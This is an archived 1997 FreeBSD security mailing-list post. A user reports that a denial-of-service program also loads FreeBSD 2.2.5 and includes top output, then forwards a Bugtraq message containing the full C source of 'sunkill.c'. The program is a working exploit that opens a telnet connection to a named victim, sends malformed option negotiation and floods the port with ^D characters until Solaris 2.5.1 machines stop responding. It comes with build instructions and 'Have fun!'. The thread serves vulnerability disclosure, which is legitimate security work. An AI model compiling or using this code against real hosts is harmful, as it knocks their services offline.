Date: Sun, 14 Dec 1997 22:52:52 -0800 (PST) From: Jan Koum <jkb@best.com> To: freebsd-security@freebsd.org Subject: To kill a sun: (fwd) Message-ID: <Pine.BSF.3.96.971214223836.1241A-100000@shell6.ba.best.com>
next in thread | raw e-mail | index | archive | help
Hi all,
I tried this against my 2.2.5-RELEASE machine which is on the
ethernet with another FreeBSD (3.0-CURRENT) machine. The 2.2.5 one usually
doing nothing but running an rc5-64 client (Go team FreeBSD Japan!). Here
is what top showed:
last pid: 20938; load averages: 2.04, 1.65, 1.30 22:42:21
16 processes: 3 running, 13 sleeping
CPU states: 81.5% user, 0.0% nice, 5.0% system, 13.5% interrupt, 0.0% idle
Mem: 13M Active, 1152K Inact, 7564K Wired, 7624K Cache, 3606K Buf, 1896K Free
Swap: 128M Total, 96K Used, 128M Free
PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
3616 jkb 53 -20 824K 316K RUN 222.7H 68.89% 68.89% rc564
20923 root 63 0 192K 616K RUN 1:21 27.35% 27.35% telnetd
^^^^^^^^^^^^^
16129 root 2 0 492K 720K select 15:33 1.45% 1.45% ppp
20932 jkb 29 0 600K 796K RUN 0:01 0.04% 0.04% top
134 root 18 0 332K 416K pause 0:46 0.00% 0.00% cron
171 jkb 18 4 452K 284K pause 0:00 0.00% 0.00% csh
Usually the load is at 1.00 since I have rc564 running with
priority of -20. But this time it was 2.xx -- I guess telnetd doubled it
this time. Running this against 3.0-CURRENT (from a week ago or so) wasn't
as horrible and showed this:
last pid: 4861; load averages: 0.18, 0.65, 0.48 22:45:12
39 processes: 2 running, 37 sleeping
CPU states: 23.3% user, 0.0% nice, 3.9% system, 1.6% interrupt, 71.2% idle
Mem: 19M Active, 21M Inact, 11M Wired, 9384K Cache, 4942K Buf, 828K Free
Swap: 256M Total, 84M Used, 172M Free, 33% Inuse
PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
2894 jkb 2 0 40228K 14716K RUN 121:26 7.21% 7.21% netscape
2867 jkb 2 0 19156K 15788K select 37:14 4.46% 4.46% Xaccel
4855 root 2 0 204K 432K sbwait 0:00 2.22% 1.83% telnetd
^^^^^^^^^^^^
4858 jkb 28 0 820K 636K RUN 0:00 0.82% 0.61% top
2868 jkb 2 0 436K 456K select 0:23 0.15% 0.15% afterstep
3165 jkb 2 0 708K 344K select 0:01 0.08% 0.08% ssh
Does that mean that 2.2.5 is vulnerable to a little DoS? I am
comparing it to 3.0 which handles it with a lot of grace.
-- Yan
---------- Forwarded message ----------
Date: Sat, 13 Dec 1997 15:48:51 -0500
From: Jason Zapman II <zapman@CC.GATECH.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: To kill a sun:
This is sunkill.c
It Affects at least solaris 2.5.1 machines, both sun4c and sun4m
achitecutures. I imagine it affects all solaris 2.5.1 machines, both sparc
and x86, but im not sure. It basically works by opening a telnet
connection on the victim machine and sends a few bad telnet negotiation
options, then flooods the port with lots of ^D characters. This uses all
the streams memory (i think) on the victims machine and causes the kernel
to get very angry. The machien crawls to a halt, the cursor in X stops
moving, the machine is unresponsive to the network. Its a bad situation
all around.
/*
** To make, if your system is BSD'ish: gcc <thisfile>
** ...if your system is SysV'ish: gcc -lnsl -lsocket <thisfile>
**
** Usage: a.out <victim's hostname>
**
** Have fun!
*/
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/telnet.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 100
#define DOTS
void catchit(void)
{
printf("\nCaught SIGPIPE -- your link may be too slow.\n");
exit(1);
}
int main(int argc, char *argv[])
{
unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO, \
TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};
unsigned char nastybuf[BUFSIZE];
struct sockaddr_in sin;
struct servent *sp;
struct hostent *hp;
int s;
typedef void (*sig_t) (int);
signal(SIGPIPE,(sig_t)catchit);
memset(nastybuf,4,BUFSIZE); /* ascii 4 = ^D */
if (!(s = socket(AF_INET, SOCK_STREAM, 0))) {
printf("no socket\n");
exit(1);
}
if (!(hp = gethostbyname(argv[1]))) {
printf("unknown host\n");
exit(1);
}
bzero(&sin,sizeof(sin));
bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
sin.sin_family = AF_INET;
sp = getservbyname("telnet","tcp");
sin.sin_port = sp->s_port;
if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
printf("can't connect to host\n");
exit(1);
}
printf("connected to %s\n",argv[1]);
write(s,kludge_telopt,21); /* kludge some telnet negotiation */
/* "Let them eat ^Ds..." */
while (write(s,nastybuf,BUFSIZE) != -1) {
#ifdef DOTS
write(STDOUT_FILENO,".",1);
#endif
}
}
Jason
--
Jason Price | If you want to build a ship, don't drum up people
Theta Xi, | together to collect wood and don't assign them tasks
Beta, Alpha 449 | and work, but rather teach them to long for the endless
jprice@poboxes.com | immensity of the sea. -- Antoine de Saint Exupery
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.971214223836.1241A-100000>